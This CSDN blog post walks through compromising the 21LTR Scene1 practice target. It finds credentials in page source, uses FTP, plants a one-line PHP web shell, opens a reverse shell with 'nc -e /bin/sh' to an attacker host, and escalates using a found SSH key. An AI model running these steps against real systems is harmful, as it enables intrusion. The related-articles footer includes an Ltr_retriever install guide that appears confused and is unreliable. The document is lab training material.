21LTR.com_Scene1_2.120靶机

于 2024-07-30 21:51:11 发布
阅读量179 收藏 2
点赞数 7
文章标签: 服务器 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_74232792/article/details/140806698
版权

getshell

主机发现,端口目录扫描

只有一个logs目录,接着往下扫

访问首页,检查源代码,发现一组账号密码,可能是ssh,也可能是ftp的

访问logs接口,没有权限

尝试利用发现的账号密码,ssh没有成功,尝试ftp

注意在windows上什么没有,用kali连接

下载到本地查看一下

拼接访问logs目录下的backup_log.php,发现可以访问了

作者亲笔监听靶机10001端口,每十分钟执行一次,你要坚持一直重复这条命令

写入一句话木马

浏览器验证,cmd参数可以执行系统命令

蚁剑连接或者执行反弹shell的系统命令,这里演示后一种,后面加上kali的ip和监听的端口

nc -e /bin/sh

 

是普通用户

提权

获取交互式的shell  

python -c 'import pty; pty.spawn("/bin/sh")'

cd /media/USB_1/Stuff/Keys

像是ssh私钥,尝试连接一下,连接成功

.南捱
关注
  • 7
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
LTR.zip_ltr
09-24
标题 "LTR.zip_ltr" 暗示我们关注的焦点是一个与化学工程相关的计算程序,特别是关于液态回流(LTR)的算法。在石油炼制、化工生产等领域,蒸馏塔是重要的分离设备,而液态回流是蒸馏过程中优化效率的关键因素。这个...
LTR_559ALS.rar_LTR 年用量_LTR_559ALS_STM32驱动LTR-303_STM32驱动LTR_559A
07-15
标题中的“LTR_559ALS.rar_LTR 年用量_LTR_559ALS_STM32驱动LTR-303_STM32驱动LTR_559A”表明这是一个关于LTR-559ALS光感应器在STM32微控制器上的驱动程序和应用的资源包。关键词“年用量”可能指的是该传感器在特定...
l-sock.zip_linux socket_socket_socket linux_zip
09-14
例如,"i\dw-logo2.gif"可能是一个网站或文档的logo,"i\icon-pdf-ltr.gif"可能表示一个从左到右阅读的PDF文档图标。 综上所述,这个压缩包中的内容很可能详细阐述了如何在Linux环境中使用Socket API进行网络编程,...
tcl.zip_Fish!?_fish_tcl fish_tcl程序_小程序
09-24
2. `i\icon-pdf-ltr.gif` 和 `i\icon-pdf-a4.gif` - 这些图标可能关联于PDF文件的显示,可能是在程序中表示不同方向(左到右`ltr`和可能的A4尺寸)的PDF文档。 3. `i\h-section.gif`, `i\xsection.gif`, `i\section....
Demo_bidi-0.1.15.rar_DEMO_bidi
09-24
1. **双向文本处理**(Bidi):Bidi是Unicode标准的一部分,它定义了如何在单一文本流中正确混合从左到右(LTR)和从右到左(RTL)的字符。例如,在HTML或CSS中,可以使用BIDI属性如`dir`或`unicode-bidi`来控制文本...
本地部署VMware ESXi服务实现无公网IP远程访问管理服务器
weixin_44976692的博客
07-26 2549
在虚拟化技术日益成熟的今天,VMware ESXi以其卓越的性能和稳定性,成为了众多企业构建虚拟化环境的首选。然而,随着远程办公和跨地域管理的需求增加,如何高效地远程访问和管理部署在本地数据中心的ESXi服务器,成为了企业IT部门面临的重要挑战。传统的远程访问方式往往受限于网络配置复杂、IP地址固定以及安全性能不足等问题,难以满足现代企业对于灵活、安全、高效的远程管理需求。为了解决这一难题,我们可以借助Cpolar内网穿透技术,将本地ESXi服务器的访问能力扩展到公网,实现随时随地的远程访问和管理。
ipsec VPN设备在边界情况
aimnr的博客
07-23 670
AR1和AR3充当两私网的边界设备,AR2充当ISP,要求PC1和PC2通过IPSEC互通。
使用易备数据备份软件,践行虚拟机最佳备份方案
sanyuan7783的博客
07-26 909
新的关键业务应用程序有助于为容器和容器化工作负载赋予更大动力。但是,在可预见的未来,虚拟机的应用仍会普遍存在。容器和虚拟机可以很好地协同工作,适用于大多数关键的 IT 基础设施。因此,备份虚拟机及其包含的数据、服务和应用程序仍然是企业至关重要的任务。本文以 VMware vSphere 虚拟机为例,介绍虚拟机备份的最佳实践方法。
AccessLog| 一款开源的日志分析系统
ClkLog的博客
07-26 460
系统采用Java语言、搭配OLAP数据库,涵盖基本web日志分析,同时提供性能分析,帮助高效运维
DNS反向解析、多域名解析、时间服务器相关配置
qq_74793290的博客
07-24 497
DNS反向解析、多域名解析、时间服务器
Linux 普通用户启动Nginx使用80端口,小于1024的端口
y393016244的博客
07-26 126
在root用户下执行。
续DNS服务(逆向解析、多域名、时间服务、主从DNS服务)
qq_69920145的博客
07-24 766
DNS 逆向解析(Reverse DNS Lookup)是通过 IP 地址来查找对应的域名。通常情况下,我们通过域名来获取对应的 IP 地址,这被称为正向解析。而逆向解析则是反过来,根据已知的 IP 地址获取其对应的域名。然而,逆向解析的配置和维护相对复杂,并且不是所有的 IP 地址都有对应的有效的逆向解析记录。
docker网络模式及配置
beck_li的博客
07-24 811
一、Docker网络模式 1 1、host模式 1 2、container模式 1 3、none模式 2 4、bridge模式 2 二、Docker网络配置–设置固定IP 2 1、host宿主机下载pipework如下: 2 2、安装网桥工具包bridge-utils 2 3、创建网桥并设置IP网段 2 4、启动一个容器 2 5、设置IP 2 6、网桥管理 2 7、docker版本1.9以后可使用下面这种方式: 3 7.1创建自定义网络 3 7.2启动Docker容器 3 7.3确认自建网络的容器 3
制作镜像
weixin_70278423的博客
07-29 658
go+html+mysql+redis.zip go.mod go.sum info.sql Readme.md server(是编译好的二进制程序) server.go static templates。因为我们在内网的docker宿主机上远程连接到云服务器的mysql容器里,需要一个mysql的客户端工具,需要安装mariadb软件。#进入容器会进入这个目录,工作目录,在执行镜像的时候会自动创建--》家目录 ---》docker exec。
杂记-镜像
最新发布
qq_43642885的博客
07-29 225
pip intall 出现 error: subprocess-exited-with-error 错误的解决办法———————————pip install --upgrade pip setuptools==57.5.0。-i https://pypi.tuna.tsinghua.edu.cn/simple 清华。https://zhuanlan.zhihu.com/p/562707628 镜像。" . ./" 代表上一层目录。
通过Docker安装KingbaseES V8并激活开发License
weimeilayer的博客
07-24 189
首先,我们可以去KingbaseES的官网(https://www.kingbase.com.cn/xzzx/index.htm ,在软件版本中,注意下载的镜像为x86版本)下载docker镜像,下载完成后导入即可。简单介绍一下在Docker中安装人大金仓(KingbaseES V9)的过程,以及如何更换默认的License为官方提供的365天有效期的开发License。下面的安装过程都是在WSL2中完成的。我们可以通过下面的命令从宿主来直接查看KingbaseES的版本。启动容器,可以直接下面的脚本。
Kubernetes存储 - Node本地存储卷
ComingLiu的博客
07-26 587
k8s存储
IT服务管理业务策划与实施:追求IT用户满意与持续改进
MXsoft618的博客
07-24 591
通过持续改进服务流程、提升服务效率和质量、引入新的技术工具等方式,团队可以为企业创造更大的价值并赢得IT用户的信赖和支持。服务台是IT服务管理的前线,负责接收和处理IT用户的服务请求和故障报告。因此,在策划阶段,运维团队需要深入了解IT用户的需求和期望,包括服务的可用性、性能、安全性等方面。在实施阶段,团队需要重视服务台的建设和管理,与其他团队保持紧密的合作关系,并实施有效的监控与评审机制。通过对服务过程、服务质量和IT用户满意度的持续监控和定期评审,团队可以及时发现并纠正问题,推动服务的持续改进和优化。
【国产化信创平台】虚拟机VMware Workstation Pro虚拟机下载安装
纯技术流日常开发商业开发记录总结等
07-24 287
虚拟机软件VMware Workstation Pro
Ltr_retriever安装
07-14
要安装 Ltr_retriever,请按照以下步骤进行操作: 1. 首先,确保您的计算机上已经安装了 Python 3.6 或更高版本。您可以在命令行中运行以下命令来验证您的 Python 版本: ``` python --version ``` 2. 接下来,使用以下命令克隆 Ltr_retriever 仓库: ``` git clone https://github.com/codertimo/LTR-retriever.git ``` 3. 进入 Ltr_retriever 目录: ``` cd LTR-retriever ``` 4. 安装依赖项。您可以使用 pip 来安装所需的 Python 包: ``` pip install -r requirements.txt ``` 5. 安装 ElasticSearch。您可以根据您的操作系统和偏好,选择适合您的安装方法。可以在 ElasticSearch 官方网站上找到相应的安装指南。 6. 配置 ElasticSearch。在 `LTR-retriever/configs` 目录下,有一些示例配置文件可以供您参考。您可以根据您的需求进行相应的修改。 7. 运行 Ltr_retriever。您可以通过运行以下命令来启动 Ltr_retriever: ``` python main.py ``` 这样,您就成功安装了 Ltr_retriever。请注意,这只是一个简单的安装指南,具体的步骤可能会根据您的操作系统和环境而有所不同。如有需要,请参考 Ltr_retriever 仓库中的文档和指南。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值